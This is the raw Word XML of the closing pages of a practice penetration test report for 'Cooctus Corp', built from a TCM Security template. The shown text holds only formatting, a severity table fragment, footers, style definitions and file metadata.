              <w:top w:w="70" w:type="dxa"/>
              <w:start w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Limited direct impact; best-practice or hardening improvement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="8" w:color="C7CEDA"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>End of Report - Business Confidential</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="8" w:color="C7CEDA"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="8" w:color="C7CEDA"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="8" w:space="8" w:color="C7CEDA"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Note: This report template was obtained from TCM security as part of the PJPT preparation. All logos and identifying information from TCM Security’s original sample report has been removed. The original sample reports can be found here -&gt;</w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="5B6472"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>TCM Security - Github - Sample Pentest Reports</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="even" r:id="rId23"/>
      <w:headerReference w:type="default" r:id="rId24"/>
      <w:headerReference w:type="first" r:id="rId25"/>
      <w:footerReference w:type="even" r:id="rId26"/>
      <w:footerReference w:type="default" r:id="rId27"/>
      <w:footerReference w:type="first" r:id="rId2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nsolas">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7CEDA"/>
      </w:pBdr>
      <w:jc w:val="center"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>27</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>27</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>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7CEDA"/>
      </w:pBdr>
      <w:jc w:val="center"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>27</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>27</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>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7CEDA"/>
      </w:pBdr>
      <w:jc w:val="end"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>Cooctus Corp - Penetration Test Report</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="B0341D"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">   |   Business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7CEDA"/>
      </w:pBdr>
      <w:jc w:val="end"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="5B6472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>Cooctus Corp - Penetration Test Report</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="B0341D"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">   |   Business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60" w:hanging="300"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1F2A44"/>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bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="460" w:hanging="260"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
        <w:color w:val="2E5AAC"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:start="900" w:hanging="260"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="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Calibri"/>
      <w:color w:val="1A1A1A"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F2A44"/>
      <w:kern w:val="0"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="34456B"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>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Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2E74B5"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:color w:val="2E74B5"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:color w:val="1F4D78"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>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980766"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="FooterChar" w:customStyle="1">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="0098076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Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:color w:val="1A1A1A"/>
      <w:kern w:val="0"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Strong1" w:customStyle="1">
    <w:name w:val="Strong1"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1A1A1A"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>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Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:color w:val="1A1A1A"/>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Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:color w:val="1A1A1A"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00df1e13"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="100"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00df1e13"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="100"/>
      <w:ind w:start="21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980766"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="center" w:pos="4680" w:leader="none"/>
        <w:tab w:val="right" w:pos="9360" w:leader="none"/>
      </w:tabs>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00980766"/>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hyperlink" Target="https://github.com/hmaverickadams/TCM-Security-Sample-Pentest-Report" TargetMode="External"/><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LibreOffice/26.2.6.3$Linux_X86_64 LibreOffice_project/620$Build-3</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>27</Pages>
  <Words>3667</Words>
  <Characters>23921</Characters>
  <CharactersWithSpaces>27206</CharactersWithSpaces>
  <Paragraphs>488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2026-07-07T00:33:00Z</dcterms:created>
  <dc:creator>Havok Zero</dc:creator>
  <dc:description>Crocc Crew AD Assessment</dc:description>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-13T10:42:09Z</dcterms:modified>
  <cp:revision>9</cp:revision>
  <dc:subject/>
  <dc:title>Cooctus Corp Penetration Test Report</dc:title>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>